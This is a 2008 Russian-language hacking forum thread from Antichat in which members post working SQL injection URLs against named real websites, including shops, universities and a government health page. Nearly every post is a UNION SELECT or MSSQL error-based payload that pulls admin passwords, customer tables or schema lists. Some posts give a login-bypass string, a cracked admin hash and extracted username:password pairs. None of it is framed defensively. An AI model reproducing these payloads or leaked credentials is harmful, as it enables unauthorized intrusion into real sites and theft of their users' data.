Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
06.06.2008, 07:12
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
вот еще интересненькое:
http://www.ishodniki.ru/art/print.php?cat=1&id=-1+union+select+1,2,3,4,concat_ws(0x3a,pwd),6,7,8,9 ,10,11,12,13,14,15+from+_wfspro_admin/*
admin
или
http://www.ishodniki.ru/art/print.php?cat=1&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user,pass),6 ,7,8,9,10,11,12,13,14,15+from+sympoll_auth/*
|
|
|
06.06.2008, 11:51
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
в антибояне нет
www.kulturflooring.com
Уязвимость в скрипте:
Код:
http://www.kulturflooring.com/index.php?id=1'
Подбор колонок:
Код:
http://www.kulturflooring.com/index.php?id=-1+union+select+1,2,3,4/*
Информация о базе:
Код:
4.0.26
kulturflooring_com
kultur@kulturflooring.com
|
|
|
|
06.06.2008, 16:03
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от $p01nt
www.kulturflooring.com
http://kulturflooring.com/admin/index.php
Username:' or 1=1/*
Password:Nea7
|
|
|
|
06.06.2008, 23:18
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529
Репутация:
41
|
|
http://o-sport.ru/
http://o-sport.ru/top/stats.php?id=89'+union+select+1,version(),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
5.0.30-Debian_1-log
Вытащил все че мог я)
admin:508504343ef23ff48724729cd07281e7 =>290486 Если база с хэшей не врет.
Админку не нашел если кто найдет Дайте знать где она. |
|
|
|
07.06.2008, 00:11
|
|
Новичок
Регистрация: 02.06.2008
Сообщений: 28
Провел на форуме:
245927
Репутация:
55
|
|
www.ivan-pomidorov.com/
http://www.ivan-pomidorov.com/gallery_full.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,14,15,16 ,17/*
Последний раз редактировалось XiD; 08.06.2008 в 15:28..
|
|
|
|
07.06.2008, 02:16
|
|
Новичок
Регистрация: 02.06.2008
Сообщений: 28
Провел на форуме:
245927
Репутация:
55
|
|
www.yago.by
http://www.yago.by/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
|
|
|
|
07.06.2008, 11:54
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
http://www.protopor.gr/index.php?shownews=-1/**/union/**/select/**/0,1,2,3,4,5,concat(uid,char(20),username,char(20), password),7,8,version(),10,user(),12,13,14,15,16,1 7+from+users/*
|
|
|
|
07.06.2008, 14:43
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
http://www.party-san.de/openair/festival/index.php?shownews=-1'/**/union/**/select/**/0,concat(id,char(20),username,char(20),pwd,ch
ar(20),email),2,concat(version(),char(20),database (),char(20),user()),4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22+from+pnew
s_pfuser/*&lang=de
|
|
|
|
07.06.2008, 17:31
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529
Репутация:
41
|
|
sql mssql
http://www.gastromag.ru/newsgastro/view_archive.asp?r=6&id=-1'+or+1=@@version%20--
Вытащил имена таблиц, и уже столбцы.
('column')
Вытащил имена таблиц, и солбцов)
ИМЕНА ТАБЛИЦ СТОЛБЦИ В ТАБЛИЦЕ
'infonews' ('IdRec','Header','Body','Body1','IdRazd','IdPodra zdel','arhiv','Dat')
'infonews_ext' ('idnews','archeader','source','author','newsdate' ,'photographer','AdminComment')
'Podrazdel' ('idrec','idrazd','Header')
'Razdel' ('idrec','header','GroupHeader','showsource','Show Author','ShowNewsDate')
'Subscribers' ('email','id','lastname','firstname','secondname', 'birthdate','sex','country','Town','scope')
'sysconstraints' ('id','constid','colid','spare1','status','actions ','error')
'syssegments' ('segment','name','status')
't_morebody' ('idnews','MoreBody','n') /*Может нам и интересне.
'Temp' ('Email','id','regdate')
'view_info_news' ('idrec','header','body','body1','idrazd','idpodra zdel','arhiv','dat','archeader','source','author', 'newsdate','Photographer','AdminComment','ShowSour ce','ShowAuthor','ShowNewsDate')
'Vote' ('idrec','checked','dat','ip')
'vote1' ('IdRec','checked','Dat','ip')
'vote2' ('IdRec','checked','Dat','ip')
'VoteOld' ('IdRec','checked','Dat','ip')
'foo' ('myret')
Буду осматривать все((( так как бональнова ,user,password нету(
Име базы текущего usera: 'GSnews'
Может админка не в этой базе?
А может что login и pass вобще не хранится в mssql, или нету прав на просмотр имени этой таблице?
Последний раз редактировалось tor4); 09.06.2008 в 15:11..
|
|
|
|
07.06.2008, 17:35
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
Код:
http://spa.american.edu/ccps/pages.php?ID=-20+union+select+1,2,3/*
Код:
http://www2a.cdc.gov/phlp/dailynews/default.asp?specific=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('PHLP_tblBibPub','PHLP_tblBib','CoopAgree_Projects','EPRP_PRGrants','EPRP_TBLGLOBAL','invTBLCDOrder','EPRP_TBLLOGINS','invTBLCONTACT','Campus','CoopAgree_Award','CoopAgree_ContactProject','CoopAgree_ContactReviewerPanel','CoopAgree_Contacts','CoopAgree_ContactSAE','CoopAgree_Institution','CoopAgree_InstitutionOLD','CoopAgree_PanelContact','CoopAgree_Pep','CoopAgree_PepContact','CoopAgree_ProjectSAE','CoopAgree_PrtControl','CoopAgree_PrtControlParms','CoopAgree_ReviewerPanel','CoopAgree_ReviewerPanel','CoopAgree_Role','CoopAgree_SAE','CoopAgree_Security','DPHSDRTask_Clearance','DPHSDRTask_Divisions','DPHSDRTask_Meeting','DPHSDRTask_POC','DPHSDRTask_Projects','DPHSDRTask_ProjectStatus','DPHSDRTask_ProjectTypes','dtproperties','eprpTBLCONTACT','HelpDeskAdmins','ITSO_VC_SURVEY','JohnNews','LPHPRCI_UserListing','LU_Branch','LU_Division','LU_EmailGroup','LU_Request','MGMT_Developers','MGMT_Divisions','MGMT_Projects','MGMT_ProjectStatus','MGMT_ProjectTypes','OD_TBLLOGINS','ODTASK_Clearance','ODTask_Divisions','ODTASK_Meeting','ODTask_POC'))--
Код:
http://pr.utk.edu/news/article.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('HS_TRANSACTION_LOG','dtproperties','RELEASE_UTC','releaseTBL','sysconstraints','syssegments','tntnews','vw_Release','vwDROP','vwDROP2','vwEXPIRE','vwEXPIREDATE','vwTODAY','vwUTM','vwVET','vwWeek'))--
Код:
http://idl63.ils.unc.edu/chirag/Energy/showmetadata.php?video_id=-8949+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+42,1/*
Код:
http://www.fwbusinesspress.com/display.php?id=-6716+union+select+1+from+admin/*
Код:
http://www.graysofwestminster.co.uk/newsitem.php?id=-35+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6/*
Код:
http://www.stjerome.co.uk/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*&doctype=Periodicals§ion=1
Код:
http://www.pluralism.org/news/article.php?id=-2557+union+select+1,user(),3,4,5,6,7,8,9,10,version(),database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
Код:
http://www.dysgenicrecords.com/release.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Код:
http://www.coopersurgical.com/csweb/product_100.asp?category_id=1%20or%201=(SELECT+TOP+1+last_name+FROM+csweb_user)--
имеется колонки: 'user_id','customer_number','unvalidated_customer_ number','date_created','first_name','middle_initia l','last_name','title','telephone_number','fax_num ber','email_address','password','marketing_info_id ','email_reminder
Код:
http://www.peakdistrictonline.co.uk/content.php?categoryId=1804+order+by+100/*
Код:
http://www.tartybikes.co.uk/product.php?id=-10008+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,table_name,20,21+from+information_schema.tables+limit+47,1/*
Код:
http://www.magic-pony.com/product.php?id=-2384+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*&category=western
Код:
http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)%2B%27%3A%27%2Bcast(email+as+nvarchar)+from+Customersreal+where+CustomerID=150)--
Код:
http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as++nvarchar)+from+users)--
carl:wrex
Код:
http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('hayleybookings','CancelShop2008a','hayleycharges','beachinfotest','ModCottages2009','ModCottages2008new','ModCottages2008a','cartitem','BookingNew2001','ModCottages','ModBooking2009','coastal_offers','Clusters','ModBooking2008new','ClusterCottages','monthof','BookingNew2006a','ClientCare2009','OwnerNew','BookingNew2007','ModBooking2008a','OwnerNew2001','BookingNew2007old','users','ClientCare2008a','OwnerNew2002','BookingNew2008','CancelBooking2008a','ClientCare2007','OwnerNew2003','BookingNew2008a','clent_care','OwnerNew2004','ModBooking2007','OwnerNew2005','BookingNew2009','sin','location','OwnerNew2006','CCPHomePage','CottageMaint2009','CottageMaint2008a','CottageMaint2007','OwnerNew2007old','CancelBooking2009','Customersreal','emailreport','guestbook','emailcontent','CottagesNew2008new','ecards','dogs','D99_Tmp','OwnerNew2009','Caretaker2007','picofmonth','Caretaker2007a','customers','PricesNew2007','Caretaker2007b','PricesNew2008a','LateDeals','Caretaker2008','Caretaker2008a','PricesNew2009','Caretaker2008b','CancelBooking2008new','Pricing2000','Caretaker2009','Pricing2001','Caretaker2009a','Pricing2002','Caretaker2009b','pricing2003','pricing2004','celebrations','pricing2005','Charges','pricing2006','Charges2001','pricing2006a'))--&category=9
Код:
http://www.magicbeard.com/view.php?id=-35'+union+select+1,2,3,4,5,6,7,8,9/*
Код:
http://www.cz-usa.com/product_detail.php?id=-74+union+select+1,2,3,4,5,6/*
Код:
http://www.solarstyleinc.com/detail.php?ID=-64+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Код:
http://edgartownboardoftrade.com/php/events2.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
Код:
http://www.menupix.com/boulder/restaurants.php?id=-700105+union+select+1,2,3/*
Код:
http://www.airsideshop.com/product.php?id=-298+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,14,14,14,14,14,14/*
Код:
http://www.pharmaexpress.us/resource/products/orderInfoForm.asp?ID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('TABLE_PRIVILEGES','TABLES','SCHEMATA','OrderSearchedWords','KNUEPPELS_Reorder','surfmedproducts','OrderProductsCOPY','Careers','Sheet1$','OrderCustomers','tblPolls','ArticleTypes','tblConfiguration','lifeplus','lifplusCLEAN','MotionWhatsNew','MotionNews','MotionLogin','OrderInsuranceApp','MalEmails','OrderMfgs','OrderProducts','Audit','ArticleCategories','StateNames','OrderReceipts','ArticleUploads','OrderOwnerProducts','OrderLIreorder','Deliveries','OrderCategory','OrderBasket','OrderOwners','AppointmentRegistration','Aronson_Referral_Form','Articles','PollTakers','Polls','PollQuestions','REFERENTIAL_CONSTRAINTS','CHECK_CONSTRAINTS','UnityHME_news','CONSTRAINT_TABLE_USAGE','CONSTRAINT_COLUMN_USAGE','VIEWS','AEROFLOW_Forms','OrderProductsNEW','VIEW_TABLE_USAGE','VIEW_COLUMN_USAGE','GalleryTopics','ResFormLineItems','GalleryPhotos','syssegments','sysconstraints','sysalternates','ValidUsers','KEY_COLUMN_USAGE','ResFormCustomers','TankMasterTanks','TankEvacuation','OrderSubmitToLoc','dtproperties','TankAnalyzerCheck','!SiteOwners','TankAudit','TankLocation','TreeList_Tmp','TankValidUsers','OrderInfoRequests','TankDetails','ResFormProducts','TABLE_CONSTRAINTS','COLUMNS','COLUMN_DOMAIN_USAGE','LINCOLN_ReferralForm','COLUMN_PRIVILEGES','DOMAINS','DOMAIN_CONSTRAINTS','UnityHME_news_categories'))--
Код:
http://dma.ucla.edu/gallery/faculty_gallery.php?ID=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Код:
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
